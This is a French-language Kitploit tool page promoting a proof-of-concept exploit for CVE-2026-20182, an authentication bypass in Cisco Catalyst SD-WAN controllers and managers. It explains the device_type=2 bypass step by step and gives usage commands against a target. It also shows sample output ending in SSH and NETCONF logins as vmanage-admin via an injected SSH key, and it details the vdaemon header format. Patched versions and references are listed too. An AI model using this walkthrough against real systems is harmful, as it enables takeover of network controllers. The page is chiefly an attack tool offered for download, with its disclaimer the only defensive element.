Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-20182 — CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0) | Kitploit
Outils/GitHubGitHub/portbuster1337/cve-2026-20182
Exploit FrameworksVulnerability AnalysisExploitationNetwork SecurityPenetration TestingCloud SecurityAuthenticationRed Teaming
GitHubportbuster1337/cve-2026-20182

CVE-2026-20182

CVE-2026-20182 PoC - Cisco Catalyst SD-WAN Controller / Manager Authentication Bypass (CVSS 10.0)

Voir le dépôt
3il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Site web

CVE-2026-20182 — Contournement d'authentification du contrôleur/gestionnaire Cisco Catalyst SD-WAN

Un exploit proof-of-concept pour CVE-2026-20182, un contournement d'authentification critique (CVSS 10.0) dans le service vdaemon DTLS (UDP/12346) sur le contrôleur Cisco Catalyst SD-WAN (vSmart) et le gestionnaire (vManage).

Divulgué : 14 mai 2026 par Rapid7 (Stephen Fewer & Jonah Burgess)
CISA KEV : Ajouté le 14 mai 2026 (Directive d'urgence 26-03)
CVSS : 10,0 — CWE-287 : Authentification inappropriée

Vulnérabilité

Le service vdaemon utilise une poignée de main DTLS multiphase pour authentifier les pairs du plan de contrôle. La fonction vbond_proc_challenge_ack() implémente une vérification de certificat spécifique au type d'appareil — mais le type d'appareil 2 (vHub) ne comporte aucun chemin de code de vérification. L'envoi d'un CHALLENGE_ACK avec device_type=2 fait passer la fonction à travers toutes les conditions et définit inconditionnellement peer->authenticated = 1.

Aucun identifiant valide, aucun certificat signé par une AC et aucune connaissance du déploiement SD-WAN ne sont nécessaires.

Ce que fait l'exploit

  1. Établit une connexion DTLS 1.2 au service vdaemon de la cible (UDP/12346)
  2. Reçoit le message CHALLENGE (msg_type=8)
  3. Envoie CHALLENGE_ACK en se déclarant comme vHub (device_type=2) → le pair est marqué comme authentifié
  4. Envoie HELLO (msg_type=5) → le pair passe à l'état UP
  5. Injecte une clé publique SSH dans /home/vmanage-admin/.ssh/authorized_keys via MSG_VMANAGE_TO_PEER (msg_type=14)
  6. Accorde un accès NETCONF (SSH TCP/830) ou un accès SSH (TCP/22) en tant que vmanage-admin

Utilisation

root@kitploit:~
python3 cve-2026-20182.py -t <target> [options]

Options

ArgumentDescription

Exemples

root@kitploit:~
# Générer une nouvelle paire de clés et exploiter
python3 cve-2026-20182.py -t 192.168.1.100

# Utiliser une clé publique existante
python3 cve-2026-20182.py -t 192.168.1.100 --key-file ~/.ssh/id_rsa.pub

# Exploiter et vérifier via NETCONF
python3 cve-2026-20182.py -t 192.168.1.100 --netconf

Sortie

root@kitploit:~
[*] Targeting 192.168.1.100:12346 (vdaemon DTLS)
[+] DTLS handshake complete (received msg_type=8, 1027 bytes)
[*] Sending CHALLENGE_ACK with device_type=2 (vHub) ...
[+] peer->authenticated = 1 (authentication bypassed!)
[*] Sending HELLO ...
[+] Peer is UP state (peering handshake bypass successful)
[*] Injecting SSH public key ...

[+] NETCONF: ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa -p 830 [email protected]
[+] SSH:     ssh -i /tmp/cve-2026-20182_key -o HostKeyAlgorithms=+ssh-rsa [email protected]

Versions affectées

Références de recherche

  • Rapid7 (Divulgation originale) : CVE-2026-20182 : Contournement d'authentification critique dans le contrôleur Cisco Catalyst SD-WAN — Analyse technique complète, code décompilé et détails du protocole par Stephen Fewer & Jonah Burgess
  • Avis de sécurité Cisco : cisco-sa-sdwan-rpa2-v69WY2SW — Avis du fournisseur avec les versions corrigées
  • CISA KEV : CVE-2026-20182 — Directive d'urgence 26-03 (correction avant le 17 mai 2026)
  • NVD : CVE-2026-20182 — Entrée de la National Vulnerability Database
  • Module Metasploit de Rapid7 : cisco_sdwan_vhub_auth_bypass — Module auxiliaire dans le framework Metasploit
  • BleepingComputer : Cisco avertit d'une nouvelle faille SD-WAN critique exploitée dans des attaques zero-day
  • Tenable : FAQ sur l'exploitation continue des vulnérabilités Cisco SD-WAN
  • Cisco Talos : L'acteur malveillant UAT-8616 attribué à l'exploitation de cette vulnérabilité dans la nature

Détails techniques

L'en-tête du protocole vdaemon est de 12 octets :

Types d'appareils : 1=vEdge, 2=vHub, 3=vSmart, 4=vBond, 5=vManage

Prérequis

  • Python 3.7+
  • CLI openssl (pour le transport DTLS)
  • Bibliothèque cryptography (pip install cryptography)

Avertissement

Cet exploit est destiné uniquement aux opérations autorisées de red team, aux tests de pénétration et à la recherche en sécurité sur des systèmes pour lesquels vous disposez d'une autorisation écrite explicite. Toute utilisation non autorisée est illégale.

Télécharger l’outil
-t, --targetAdresse IP ou nom d'hôte cible
--portPort UDP vdaemon (par défaut : 12346)
--key-fileChemin vers une clé publique SSH existante à injecter (optionnel)
--netconfVérifier l'exploitation en se connectant à NETCONF via SSH
VersionVersion corrigée
< 20.9Migrer vers une version prise en charge
20.920.9.9.1
20.1020.12.7.1
20.1120.12.7.1
20.1220.12.5.4 / 20.12.6.2 / 20.12.7.1
20.1320.15.5.2
20.1420.15.5.2
20.1520.15.4.4 / 20.15.5.2
20.1620.18.2.2
20.1820.18.2.2
26.1.126.1.1.1
DécalageTailleChampNotes
01msg_typeNibble bas = type, nibble haut = version
11device_infoNibble haut = device_type, nibble bas = flags
21flagsValeur standard 0xA0
31paddingToujours 0x00
4-74domain_iduint32 big-endian
8-114site_iduint32 big-endian